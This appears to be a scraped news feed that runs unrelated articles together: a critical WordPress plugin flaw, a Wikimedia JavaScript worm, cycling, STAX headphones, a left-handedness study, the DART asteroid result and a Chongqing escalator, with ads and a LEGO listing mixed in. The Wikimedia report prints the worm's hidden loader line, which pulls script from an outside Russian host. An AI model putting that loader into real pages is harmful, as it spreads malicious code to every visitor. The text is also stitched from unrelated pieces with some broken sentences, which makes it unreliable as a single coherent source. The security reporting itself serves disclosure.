Hackers are exploiting a critical vulnerability in the User Registration & Membership plugin, which is installed on more than 60,000 WordPress sites.

Developed by WPEverest, the plugin provides membership and user registration management features, including custom forms, payment integrations with PayPal and Stripe, bank transfers, and analytics.

The security vulnerability is tracked as CVE-2026-1492 and received a critical severity rating of 9.8. Because the plugin accepts a user-supplied role during membership registration, hackers can create administrator accounts without authentication.

An administrator account has full access on the website, and it is required to install plugins and themes, edit PHP code, change security settings, modify site content, and lock out legitimate owners or admins.

An attacker with this level of access can steal data, such as the database of registered users, and embed malicious code to distribute malware to visitors.

Researchers at WordPress security company Defiant, the maker of the Wordfence security plugin, blocked more than 200 attempts to exploit CVE-2026-1492 in customer environments in the past 24 hours.

The vulnerability affects all versions of User Registration & Membership through 5.1.2. The developer released a fix in version 5.1.3 of the plugin. Website admins are advised to update to the latest version of the plugin, which is currently 5.1.4, released last week.

If updating is not possible, the recommendation is to temporarily disable or uninstall the plugin.

According to Wordfence data, CVE-2026-1492 is the most severe vulnerability in the User Registration & Membership plugin disclosed this year.

Hackers are constantly targeting WordPress sites for malicious activities that include malware distribution, phishing, hosting command-and-control servers, proxy malicious traffic, or to store stolen data.

In January 2026, hackers began exploiting a maximum-severity flaw (CVE-2026-23550) in the Modular DS WordPress plugin, allowing them to bypass authentication remotely and access vulnerable sites with admin-level privileges.

Malware is getting smarter. The Red Report 2026 reveals how new threats use math to detect sandboxes and hide in plain sight.

Download our analysis of 1.1 million malicious samples to uncover the top 10 techniques and see if your security stack is blinded.

Advertisement

Download The Report

Update: Added Wikimedia Foundation’s statement below and made a correction to denote it was only the Meta-Wiki that was vandalized.

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages.

Editors first reported the incident on Wikipedia’s Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

The JavaScript worm

According to Wikimedia’s Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

BleepingComputer’s review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user’s common.js and Wikipedia’s global MediaWiki:Common.js, which is used by everyone.

MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:/common.js, which are executed in editors’ browsers to customize the wiki interface.

After the initial test.js script was loaded in a logged-in editor’s browser, it attempted to modify two scripts using that editor’s session and privileges:

• User-level persistence: it tried to overwrite User:/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
• Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.

If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]

[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]

According to BleepingComputer’s analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.

As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been “supressed” and are no longer visible in the change histories.

At the time of writing, the injected code has been removed, and editing is once again possible.

However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored.

Malware is getting smarter. The Red Report 2026 reveals how new threats use math to detect sandboxes and hide in plain sight.

Download our analysis of 1.1 million malicious samples to uncover the top 10 techniques and see if your security stack is blinded.

Download The Report

The season is now in full swing as the peloton starts the 84th Paris-Nice, the most prestigious of the early season stage races.

Leading the field this year and making his season debut is two time Tour de France winner Jonas Vingegaard.

STAX (part of Edifier), a leader in the implementation of Electrostatic audio technology in headphones, has announced the latest version of this classic SR-009 electrostatic headphone platform, the SR-009D.  This latest version of the standard setting iconic SR-009 and the intervening SR-009S is a direct response to overwhelming demand from audiophiles and music lovers.

What Are Electrostatic Headphones?

An electrostatic headphone uses drivers similar to those used in electrostatic speakers, but on a much smaller scale. 

An electrostatic driver for headphone applications employs a very thin diaphragm that is placed between two perforated metal plates. The diaphragm holds a constant electrical charge as a result of a conductive coating. The membrane is firmly attached in place with “spars” that allow it to move back and forth freely to produce sound.

Electrostatic drivers are noted for their exceptional accuracy, very low distortion, and quick response. However, to operate electrostatic headphones, an external amplifier (sometimes referred to as an energizer) is needed that can supply the needed power – one external amplifier option is the STAX SRM-400S. You just don’t plug an electrostatic headphone into your typical headphone output. Electrostatic headphones are typically not only more expensive than other types, but are also more expensive to operate.

There are more details, but the above description gives you a basic idea of how electrostatic drivers work in headphones and what you need to hear what they can do.

Pro Tip: STAX refers to their Electrostatic Headphones as Earspeakers. 

SR-009D Improvements

The SR-009D has been updated with modern features for enhanced usability and longevity. It preserves the same groundbreaking technology that made the original SR-009 a headphone benchmark, while incorporating key improvements that fit in with the current STAX lineup. 

MLER (Multi-Layer ElectRodes): The SR-009 and 009D both utilize MLER (Multi-Layer ElectRodes) technology, which uses photo-etched metal plates bonded at the atomic level. MLER was introduced on the SR-009, which provided speed and “see-through” clarity that was not available at the time. 

The SR-009D retains the core MLER architecture of the SR-009 but with modern refinements. Instead of the gold-plating of the SR-009S that was released in 2018, the “D” model uses a refined version of the original SR-009 stainless steel plates that maintains the classic, lightning-fast 009 sound signature.

Detachable Cable: The SR-009 incorporated a fixed, non-removable cable. If the cable snagged or failed, it meant a costly and stressful trip to a service center. To make life easier and connectivity more flexible the SR-009D provides a detachable detachle cable.

Build & Comfort: One of the most significant physical changes is the housing material. The SR-009 had a heavy, all-aluminum frame, which resulted in a heavy overall weight. The SR-009D incorporates an injection-molded unit case. This significantly reduces the weight (down to roughly 452g without cable), resulting in more comfortable long listening sessions 

Sound Profile: The SR-009D smooths out the mid-range frequencies over the original 009 for a more balanced sound listening experience.

Earpad Materials: Genuine sheep leather earpads provide a luxurious and comfortable listening experience. 

Headband: Instead of a friction slider used in the original SR-009, the 009D incorporates a 10-step headband click mechanism.

Aluminium Carrying Case: This provides a lightweight, durable, and secure protection against impacts, weather, dust, heat, and wear, ensuring the long-term preservation of headphones 

From Douglas Ip, Sales & Marketing Head, STAX Limited. “The SR-009 has always held a special place in the hearts of our customers and in the history of STAX,…With the SR-009D, we are thrilled to bring back that legendary sound, updated with the features that our customers have long asked for. It is the perfect gateway to the world of high-end electrostatic audio, offering an unmatched listening experience at a much more accessible price point.” 

Comparison

Bottom Line 

Electrostatic headphones are in a different class, using technology that might you find in select speakers from MartinLogan and Final Audio, only in a much smaller and portable form factor. STAX is the “king of the hill”  in the electrostatic headphone category, and their new 009D continues the legacy of their celebrated 009 series.

However, as dominant as STAX is in electrostatic headphone category, there is competition from Audeze, HiFiMAN, and Warwick Acoustics at higher price points.

Electrostatic headphones are not for the casual or budget-minded music listeners as in addition to the cost of purchasing them, the cost of operation has to be taken into consideration, as they require an additional external amplifier to access desired sonic results. 

On the other hand, if you aren’t satisfied with your current headphone listening experience and have extra cash, the STAX SR-009D might be just for you. There is even hope for more budget-minded headphone fans as STAX also offers the SR-X1 for the “low price” of $535!

Price & Availability

The SR-009D is available now directly through STAX, Authorized Dealers, and Distributors. North America Pricing is $2,890. 

Note: The SR-009S is still available for $4,545 and the original SR-009 has been discontinued for some time.

Related Reading

The very existence of left-handedness seems to defy Darwin. According to the theory of evolution by natural selection (in very simplified terms), a species should retain the characteristics necessary for survival and reproduction and discard those that are not very useful. And yet around 10 percent of people continue to develop greater dexterity in their left hand, a rate that has remained stable throughout history. Why do humans continue to retain this peculiar ability?

A study conducted by researchers at the University of Chieti-Pescara in Italy set out to confirm a hypothesis indicating that, while right-handed people have advantages in cooperative behaviors, left-handed people—particularly males, the study notes—have advantages in competitive behaviors, especially in one-on-one situations. This hypothesis is based on evolutionarily stable strategy (ESS), a concept from game theory applied to evolution.

This is how ESS explains why the proportion of left-handed people remains low but constant. If almost everyone in a population is right-handed, being left-handed offers a frequency-dependent advantage: Being in the minority, left-handers are less predictable in competitive interactions (e.g., a boxing match), which may translate into small advantages (left hook!). But if left-handedness became very common, that advantage would disappear because others would adapt to encountering left-handers with the same frequency. In evolutionary terms, a “stable equilibrium” is reached when the majority are right-handed and a minority are left-handed, because neither “strategy” can completely eliminate the other since their advantages change depending on how frequent each is in the population.

How can a study support this hypothesis? The Italian researchers conducted two experiments to see whether a dominant hand is linked to any specific personality type. The results were recently published in the academic journal Scientific Reports.

Righty vs. Lefty

In the first experiment, about 1,100 participants completed questionnaires designed to measure their handedness (their level of dexterity between one hand and the other) and various facets of competitiveness, such as their inclination to achieve personal goals or their aversion to anxiety-driven competition. The results showed that people who identified with greater left-handed laterality tended to show higher levels of personal development-oriented competitiveness and lower levels of anxious avoidance. That is, left-handers tended to be more inclined to engage in competitive situations than right-handers.

In addition, when strongly lateralized groups were compared (just pure southpaws, no ambidextrousness), left-handers scored higher on “hypercompetitiveness,” a trait that implies an intense desire to win, even at the expense of others.

In the second experiment, a subgroup of 48 participants (half right-handed and half left-handed, with equal proportions of men and women) took a pegboard test, a classic laboratory test that measures manual dexterity. Interestingly, no significant differences were observed here either between left-handers and right-handers or between laterality measures and competitiveness scores. This suggests that hand preference and competitiveness are not directly related to motor skills.

Give Them a Hand

According to the authors of the study, left-handedness is not simply a biological accident, but a characteristic that may offer advantages in competitive contexts and is therefore worth preserving. This supports, at least in part, the idea that the unequal distribution between right-handers and left-handers could be maintained by an evolutionary balance. While the right-handed majority favors social cooperation, the left-handed minority benefits in competitive contexts, where surprise plays a role.

But what about other personality types? Are left-handed people more extroverted or more emotionally unstable? The study cited here found no significant differences between left-handed and right-handed people in the Big Five personality traits (openness, conscientiousness, extraversion, agreeableness, and neuroticism). Nor was there any relationship between handedness and levels of depression or anxiety in this sample of people without a psychiatric diagnosis. This suggests that the advantage associated with left-handedness is more linked to competitiveness than to general differences in personality or mental health.

The study also examined differences by sex. Men, in general, scored higher on hyper-competitiveness and development-oriented competitiveness, while women showed a greater tendency to avoid competition due to anxiety. This suggests that the interaction between hand preference, competitive profile, and gender is complex and likely influenced by multiple biological and environmental factors that warrant further investigation.

This story originally appeared on WIRED en Español and has been translated from Spanish.

When NASA crashed a spacecraft into the asteroid moonlet Dimorphos in 2022, it altered both Dimorphos’ orbit around its parent asteroid, Didymos, and the two objects’ orbit around the sun, according to new research. NASA’s Jet Propulsion Laboratory (JPL) said in a press release that this “marks the first time a human-made object has measurably altered the path of a celestial body around the Sun.” It’s a promising result as scientists work to find a feasible method of defending Earth from hazardous space objects.

The Double Asteroid Redirection Test (DART) mission was designed to demonstrate one possible way of deflecting such an object, targeting the non-threatening moonlet Dimorphos, which is about 560 feet wide. NASA quickly declared it a success after its initial analysis showed the planned collision shortened Dimorphos’ orbit around Didymos, the larger of the two objects in the binary asteroid system. In a follow-up study published in 2024, a team at NASA’s JPL reported that Dimorphos’ orbital period had been trimmed by about 33 minutes, as its path was nudged roughly 120 feet closer to Didymos than before. The latest study now indicates that the whole binary system was affected, not just Dimorphos.

Didymos and Dimorphos have a 770-day orbital period around the sun, which lead author Rahil Makadia said has been changed by “about 11.7 microns per second, or 1.7 inches per hour.” That might not sound like much, but according to Makadia, “Over time, such a small change in an asteroid’s motion can make the difference between a hazardous object hitting or missing our planet.”

Photo credit: China News Service
Wushan County residents in Chongqing, China can now easily enter and exit neighborhoods that used to require an hour of navigating steep slopes and tight roads. The Wushan Goddess Escalator finally opened its doors on February 17, 2026, just in the midst of Chinese New Year festivities.

The engineers behind the idea built the entire thing along the vertical axis of Goddess Avenue in the Gaotong area, all 905 meters long, with riders able to climb an astounding 242.14 meters from the bottom to the summit. To give you an idea, that is about equivalent to a skyscraper that is 80 stories tall. It consists of 21 escalators, 8 elevators, 4 moving walkways, 2 pedestrian bridges, and 2 overpasses all linked together to form a seamless trail that hugs the mountainside as you go.

LEGO Architecture Paris – City of Love Building Set for Adults – DIY Office or Bedroom Decor for Women…

• MODEL KIT FOR ADULTS – Adults ages 18 and up can embrace their love of architecture with this LEGO building set (21064), which makes striking home…
• DETAILED PARIS DECOR – This detailed model features 4 iconic Paris landmarks—the Eiffel Tower, Notre-Dame de Paris, the Arc de Triomphe, and the…
• HANG OR STAND TO DISPLAY – Your completed cityscape includes a buildable frame and a decorated ‘City of Love’ brick and can be hung on a wall or…

For years, locals in this part of Chongqing had to drag themselves up staircases or take the long way around on roads that pretty much followed the lay of the land, but that has all changed: the 20-minute journey that is now possible on this section means locals can go to work, run errands, and visit family without breaking a sweat. Tourists may now easily get to sites with views of Wu Gorge and the spectacular Three Gorges views. Not to mention the views on the way up, which are just as breathtaking as the ones from the bottom.

The construction crew was determined to get things properly in this notoriously steep city. Officials built the escalator with locals in mind, so it can handle all of the usual foot traffic while still running strong in poor weather and changing terrain. Riders are currently paying only 3 yuan (40 cents) to try it out during the trial phase. After that, they’ll take a closer look at how it performs in real-world scenarios and determine the final price.

This is a record-breaker, stretching farther and climbing higher than any other escalator in Chongqing, including the Crown Escalator in the city center. Its sheer length means it outperforms all other competitors to become the world’s longest outdoor escalator system, but what truly sets it apart is the combination of escalators, lifts, and walkways that follow the mountain contour rather than attempting to plough a straight line up the side.
[Source]

There is little indication that the momentum of Europe’s startup community will slow down, with $44 billion of funding raised last year. Yet, converting early success into sustainable growth is still an uphill climb.

Founders face challenges ranging from strict data sovereignty regulations to diverse regulatory frameworks and the operational burden of expanding across multiple regions.